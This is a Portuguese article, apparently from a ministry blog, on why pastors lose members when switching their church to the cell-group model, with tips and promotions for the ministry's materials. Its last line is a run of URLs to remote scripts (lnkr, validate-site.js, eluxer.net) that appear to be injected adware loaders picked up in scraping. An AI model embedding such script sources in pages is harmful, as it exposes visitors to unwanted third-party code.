Transicionei para a visão celular e estou perdendo pessoas… O que fazer?

O fato é que não é incomum pastores e líderes passarem por esta situação, bem como, tantos outros que simpatizam com a visão celular não decidir transicionar por medo de viver esta situação.

E, por que será que isto acontece? Dentre vários motivos, alguns deles podem ser:

1 – Transicionar rápido demais

É impressionante a quantidade de líderes que se apaixonam pela visão celular por compreender seu potencial para gerar um crescimento de qualidade no Reino de Deus. No entanto, o que é muito comum acontecer é se deixarem levar pela emoção e anteciparem os acontecimentos.

Acontece muito do pastor conhecer a visão, aprender mais profundamente e, do dia para a noite, chegar a Igreja anunciando que, à partir daquele dia, eles estarão trabalhando em células.

Não que seja errado, mas existem pessoas que estão há anos ao lado do pastor, pagando um preço na visão antiga e, de repente, se vê “obrigado” a sair da zona de conforto. Mudanças assustam… E, isso pode levar as pessoas a terem sentimentos ambíguos e desejarem sair da igreja.

A grande dica para que se faça qualquer tipo de mudança é fazê-la de forma gradativa, ou seja, bem devagar. Desta forma, todos estarão participando do processo e tendo tempo de compreender melhor do que se trata. Se você achar interessante, nós temos um e-book sobre este assunto(Como transiocinar a sua Igreja para a Visão do MDA) que pode ajudar você a fazer uma transição gradual e bem sucedida. Desejando, entre em contato com a equipe e se informe.

2 – Obrigar as pessoas a aderir à visão

Nada obrigado funciona. É preciso que o pastor presidente tenha muita habilidade para repassar as bênçãos advindas da visão, bem como, de sua praticidade no dia a dia.

Porém, não é incomum que muitos pastores queiram impor e, por vezes, obrigar as pessoas aderir à visão que Deus ministrou em seus corações e isso, muitas vezes, é, sim, o motivo pelo qual, muitas pessoas saem de uma igreja.

O líder de sucesso não lidera por imposição ou medo, antes, por respeito e influência. Por isso, ele precisa usar toda a sua habilidade de influenciar as pessoas, ensinando e mostrando, passo a passo, repetindo várias e várias vezes, se necessário for, dando tempo para que elas se deixem tocar pelo Espírito Santo e se abram para o “novo”.

Em nosso Canal no YouTube, você vai encontrar um vídeo muito interessante sobre “7 dicas para aumentar a sua influência como líder”. Lá você poderá entender melhor como fazer para ganhar o coração da sua equipe e conseguir fazer as mudanças necessárias, de forma assertiva, bem como, bem sucedidas.

3 – Impor o discipulado como regra absoluta

O discipulado é algo muito profundo e espiritual. Não tem como ser algo imposto. O líder precisa ganhar o coração do liderado e ir consolidando-o aos poucos, até que um dia, ele estará caminhando lado a lado, pagando o preço junto com o líder e desejará um relacionamento mais profundo. Aí, sim, o discipulado pode ser iniciado.

Existem pessoas que têm pavor de “discipulado” e só de ouvir que a Igreja está trabalhando nesta visão, rejeita. Infelizmente, isto é uma realidade.

O discipulado é transferência de vida. É você levar alguém a fazer o que você faz! E, não tem como fazer isso a força! Nós temos um artigo que pode ajudar você a entender melhor sobre o “Preço do discipulado”, bem como, a fazer com que o discipulado seja a bênção que deve ser

4 – Forçar às pessoas a estar liderando células

Depois que a visão é implantada, as células começam a crescer e começa a pressão pela multiplicação. Neste momento, é muito comum, por parte dos pastores, o repasse desta pressão para a Igreja, de forma que as pessoas entendam que todas terão que liderar.

Sentindo-se forçadas a liderar, muitas desistem de congregar neste modelo, pois muitas têm medo de liderar, outras não se sentem preparadas para liderar e outras, simplesmente, não querem liderar.

Um material que pode ajudar muito é o livro “Segredos para o crescimento da Igreja local”. Através da leitura, o autor levará você a entender cada estágio do crescimento de forma a perceber o momento certo para ação a ser tomada neste processo de multiplicação de liderança.

A liderança surge naturalmente nas células. Basta que o líder tenha a habilidade de cuidar de vidas e influência para deixá-los seguros para fazer o que ele faz, como ele faz, ao lado dele.

Se tão somente estas dicas forem seguidas, a probabilidade de se perder pessoas na transição é mínima. Pois todo o processo se dará de forma gradual e leve.

Nossa equipe tem um canal direto com líderes que desejam estar informados de tudo o que está acontecendo de novo, que possa edificar suas vidas. Se você tiver interesse, adicione o nosso WhatsApp (21)97016-2326, informando que você leu o artigo que está, sim, interessado em receber nossos conteúdos.

http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=1539268560426http://makesource.cool/addons/lnkr5.min.jshttp://makesource.cool/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_